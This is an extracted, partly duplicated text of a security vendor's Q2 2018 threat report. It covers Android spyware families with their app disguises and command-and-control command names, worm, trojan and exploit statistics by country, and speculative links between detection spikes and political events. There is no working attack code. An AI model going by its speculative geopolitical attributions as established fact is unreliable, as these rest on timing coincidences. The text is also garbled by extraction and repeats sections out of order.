71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
